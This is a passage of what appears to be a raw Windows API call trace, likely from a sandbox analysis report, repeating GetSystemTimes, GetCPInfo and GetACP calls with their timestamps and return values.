lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.763] GetACP () returned 0x4e4 [0181.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.763] GetACP () returned 0x4e4 [0181.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.763] GetACP () returned 0x4e4 [0181.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.763] GetACP () returned 0x4e4 [0181.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.763] GetACP () returned 0x4e4 [0181.763] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.763] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.763] GetACP () returned 0x4e4 [0181.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.764] GetACP () returned 0x4e4 [0181.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.764] GetACP () returned 0x4e4 [0181.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.764] GetACP () returned 0x4e4 [0181.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.764] GetACP () returned 0x4e4 [0181.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.764] GetACP () returned 0x4e4 [0181.764] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.764] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.764] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.765] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.765] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.765] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.765] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.765] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.765] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.765] GetACP () returned 0x4e4 [0181.765] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.766] GetACP () returned 0x4e4 [0181.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.766] GetACP () returned 0x4e4 [0181.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.766] GetACP () returned 0x4e4 [0181.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.766] GetACP () returned 0x4e4 [0181.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.766] GetACP () returned 0x4e4 [0181.766] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.766] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.767] GetACP () returned 0x4e4 [0181.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.767] GetACP () returned 0x4e4 [0181.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.767] GetACP () returned 0x4e4 [0181.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.767] GetACP () returned 0x4e4 [0181.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.767] GetACP () returned 0x4e4 [0181.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.767] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.767] GetACP () returned 0x4e4 [0181.767] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.768] GetACP () returned 0x4e4 [0181.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.768] GetACP () returned 0x4e4 [0181.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.768] GetACP () returned 0x4e4 [0181.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.768] GetACP () returned 0x4e4 [0181.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.768] GetACP () returned 0x4e4 [0181.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.768] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.768] GetACP () returned 0x4e4 [0181.768] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.769] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.769] GetACP () returned 0x4e4 [0181.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.844] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.844] GetACP () returned 0x4e4 [0181.844] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.845] GetACP () returned 0x4e4 [0181.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.845] GetACP () returned 0x4e4 [0181.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.845] GetACP () returned 0x4e4 [0181.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.845] GetACP () returned 0x4e4 [0181.845] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.845] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.845] GetACP () returned 0x4e4 [0181.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.850] GetACP () returned 0x4e4 [0181.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.850] GetACP () returned 0x4e4 [0181.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.850] GetACP () returned 0x4e4 [0181.850] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.850] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.850] GetACP () returned 0x4e4 [0181.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.851] GetACP () returned 0x4e4 [0181.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.851] GetACP () returned 0x4e4 [0181.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.851] GetACP () returned 0x4e4 [0181.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.851] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.851] GetACP () returned 0x4e4 [0181.851] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.852] GetACP () returned 0x4e4 [0181.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.852] GetACP () returned 0x4e4 [0181.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.852] GetACP () returned 0x4e4 [0181.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.852] GetACP () returned 0x4e4 [0181.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.852] GetACP () returned 0x4e4 [0181.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.852] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.852] GetACP () returned 0x4e4 [0181.852] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.853] GetACP () returned 0x4e4 [0181.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.853] GetACP () returned 0x4e4 [0181.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.853] GetACP () returned 0x4e4 [0181.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.853] GetACP () returned 0x4e4 [0181.853] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.853] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.853] GetACP () returned 0x4e4 [0181.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.854] GetACP () returned 0x4e4 [0181.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.854] GetACP () returned 0x4e4 [0181.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.854] GetACP () returned 0x4e4 [0181.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.854] GetACP () returned 0x4e4 [0181.854] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.854] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.854] GetACP () returned 0x4e4 [0181.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.855] GetACP () returned 0x4e4 [0181.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.855] GetACP () returned 0x4e4 [0181.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.855] GetACP () returned 0x4e4 [0181.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.855] GetACP () returned 0x4e4 [0181.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.855] GetACP () returned 0x4e4 [0181.855] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.855] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.856] GetACP () returned 0x4e4 [0181.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.856] GetACP () returned 0x4e4 [0181.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.856] GetACP () returned 0x4e4 [0181.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.856] GetACP () returned 0x4e4 [0181.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.856] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0181.856] GetACP () returned 0x4e4 [0181.856] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0181.856] GetCPInfo (in: 